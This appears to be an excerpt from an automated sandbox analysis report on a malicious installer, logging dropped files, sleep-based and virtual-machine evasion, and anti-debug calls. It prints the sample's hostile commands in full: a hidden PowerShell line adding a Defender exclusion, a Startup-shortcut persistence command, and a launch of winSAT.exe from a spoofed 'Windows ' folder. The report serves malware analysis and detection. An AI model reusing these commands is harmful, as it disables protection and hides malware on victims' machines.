Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2892
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeWindow / User API: threadDelayed 9325
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeWindow / User API: foregroundWindowGot 1772
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1972
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2265
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 494
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5812
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3971
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\vulkan-1.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\NSIS\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\resources\elevate.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\234d6ba4-850d-4c80-8096-274aff2a3936.tmp.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\039a5ffc-3e3b-416f-b75e-1c58b05c238b.tmp.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\System.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\NSIS\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\NSIS\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\55211371-e4e4-4315-9751-4ed29e5502da.tmp.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\vk_swiftshader.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\SpiderBanner.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\StdUtils.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\nsis7z.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\b1dc575e-7958-4cdc-a4c8-223d21682d6f.tmp.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\aa6ee5f9-f11d-4a3b-adf5-0dc4d4da48f4.tmp.dllJump to dropped file
Source: C:\Windows \System32\winSAT.exeAPI coverage: 5.8 %
Source: C:\Windows \System32\winSAT.exeAPI coverage: 5.9 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7228Thread sleep count: 4933 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4408Thread sleep count: 991 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1904Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5472Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3688Thread sleep count: 4400 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3688Thread sleep count: 2193 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3668Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5084Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3004Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7644Thread sleep count: 3642 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2380Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3220Thread sleep count: 868 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836Thread sleep count: 2892 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836Thread sleep count: 118 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2256Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5252Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe TID: 6076Thread sleep time: -90500s >= -30000s
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe TID: 3588Thread sleep time: -414000s >= -30000s
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe TID: 3588Thread sleep time: -27975000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 732Thread sleep count: 1972 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7496Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 732Thread sleep count: 96 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1596Thread sleep count: 2265 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2492Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7452Thread sleep count: 494 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 764Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile Volume queried: C:\Users\user\AppData\Local\Programs\NSIS FullSizeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile Volume queried: C:\Users\user FullSizeInformation
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeCode function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059CC
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeCode function: 0_2_004065FD FindFirstFileW,FindClose,0_2_004065FD
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780FC90DC SetLastError,FindFirstFileW,GetLastError,FindClose,SetLastError,CreateFileW,ReadFile,GetLastError,CloseHandle,CloseHandle,19_2_00007FF780FC90DC
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF780FD34C4 FindFirstFileW,GetLastError,FindClose,SetLastError,_CxxThrowException,22_2_00007FF780FD34C4
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF780FC90DC SetLastError,FindFirstFileW,GetLastError,FindClose,SetLastError,CreateFileW,ReadFile,GetLastError,CloseHandle,CloseHandle,22_2_00007FF780FC90DC
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FFE10251B68 FindFirstFileExW,22_2_00007FFE10251B68
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FFE10251CEC FindFirstFileExW,FindNextFileW,FindClose,FindClose,22_2_00007FFE10251CEC
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF780FD34C4 FindFirstFileW,GetLastError,FindClose,SetLastError,_CxxThrowException,31_2_00007FF780FD34C4
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF780FC90DC SetLastError,FindFirstFileW,GetLastError,FindClose,SetLastError,CreateFileW,ReadFile,GetLastError,CloseHandle,CloseHandle,31_2_00007FF780FC90DC
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FFDFFE453DC FindFirstFileExW,FindNextFileW,FindClose,FindClose,31_2_00007FFDFFE453DC
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FFDFFE45258 FindFirstFileExW,31_2_00007FFDFFE45258
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780FE5EF0 GetLogicalProcessorInformation,GetLastError,GetLogicalProcessorInformation,GetLastError,GetSystemInfo,19_2_00007FF780FE5EF0
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile opened: C:\Users\user\AppData\Local\Programs\NSIS\resourcesJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile opened: C:\Users\user\AppData\Local\Programs\NSISJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile opened: C:\Users\user\AppData\Local\ProgramsJump to behavior
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: bCK1sK9IRQq9qEmUv4RDsNuESgMjGWdqb8FuvAY5N9GIIvejQjBAMA8GA1UdEwEB/wQFMAMB
Source: YoS6ZBCcUy.exe, 00000000.00000003.1964331752.00000000061A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware
Source: YoS6ZBCcUy.exe, 00000000.00000003.2147321239.0000000004B55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}out
Source: YoS6ZBCcUy.exe, 00000000.00000002.2201242233.0000000004B54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&
Source: YoS6ZBCcUy.exe, 00000000.00000003.1964331752.00000000061A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: (IsLinux() && isVMWare) || (IsAndroid() && isNvidia) || (IsAndroid() && GetAndroidSDKVersion() < 27 && IsAdreno5xxOrOlder(functions)) || (!isMesa && IsMaliT8xxOrOlder(functions)) || (!isMesa && IsMaliG31OrOlder(functions))
Source: YoS6ZBCcUy.exe, 00000000.00000003.2147363367.000000000070C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f
Source: YoS6ZBCcUy.exe, 00000000.00000003.2143409636.0000000000701000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: YoS6ZBCcUy.exe, 00000000.00000003.2147321239.0000000004B55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: YoS6ZBCcUy.exe, 00000000.00000002.2201242233.0000000004B38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}OOY
Source: YoS6ZBCcUy.exe, 00000000.00000003.2082003478.0000000004758000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmncVMware Screen Codec / VMware Videovp5On2 VP5vp6On2 VP6vp6fOn2 VP6 (Flash version)targaTruevision Targa imageimage/x-targaimage/x-tgaR
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: lgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4zJVSk/BwJVmcIGfE
Source: YoS6ZBCcUy.exe, 00000000.00000003.2082003478.0000000004758000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Screen Codec / VMware Video
Source: YoS6ZBCcUy.exe, 00000000.00000003.1964331752.00000000061A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ZAMDARMAppleBroadcomGoogleIntelMesaMicrosoftNVIDIAImagination TechnologiesQualcommSamsung Electronics Co., Ltd.VivanteVMwareVirtIOTestp
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeAPI call chain: ExitProcess graph end nodegraph_0-3391
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeProcess information queried: ProcessInformation
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780FE5108 rdtsc 19_2_00007FF780FE5108
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FFE1024C8F0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00007FFE1024C8F0
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780F9A960 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,GetLastError,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,19_2_00007FF780F9A960
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780F932BC GetProcessHeap,HeapFree,19_2_00007FF780F932BC
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF7810A5AA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00007FF7810A5AA4
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF7810A5AA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_00007FF7810A5AA4
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FFE1024C14C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_00007FFE1024C14C
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FFE102501C4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00007FFE102501C4
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF7810A5AA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_00007FF7810A5AA4
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FFDFFE3F83C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_00007FFDFFE3F83C
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FFDFFE3FFE0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00007FFDFFE3FFE0
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FFDFFE438B4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00007FFDFFE438B4

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\tasklist.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }"
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }"
Source: C:\Windows \System32\winSAT.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }"
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq NSIS.exe" /FO csv | "C:\Windows\system32\find.exe" "NSIS.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq NSIS.exe" /FO csv
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe "C:\Windows\system32\find.exe" "NSIS.exe"
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1740,i,4228251472899139808,8446722721828354665,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1732 /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()""Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --field-trial-handle=2416,i,4228251472899139808,8446722721828354665,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2412 /prefetch:3Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows \System32\winSAT.exe "C:\Windows \System32\winSAT.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe "C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe" /NOLICPROMPT /timer:300
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1800,i,11364209571960262767,7852169953357836593,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1792 /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --field-trial-handle=2424,i,11364209571960262767,7852169953357836593,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2420 /prefetch:3
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1180,i,11364209571960262767,7852169953357836593,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1692 /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "c:\users\user\appdata\local\programs\nsis\nsis.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\nsis" --gpu-preferences=uaaaaaaaaadgaaaeaaaaaaaaaaaaaaaaaabgaaeaaaaaaaaaaaaaaaaaaaacaaaaaaaaaaaaaaaaaaaaaaaaabaaaaaaaaaaeaaaaaaaaaaiaaaaaaaaaagaaaaaaaaa --field-trial-handle=1740,i,4228251472899139808,8446722721828354665,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=1732 /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell -command "$s=(new-object -com wscript.shell).createshortcut('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\myelectronapp.lnk');$s.targetpath='c:\users\user\appdata\local\programs\nsis\nsis.exe';$s.save()""
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "c:\users\user\appdata\local\programs\nsis\nsis.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\nsis" --field-trial-handle=2416,i,4228251472899139808,8446722721828354665,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=2412 /prefetch:3
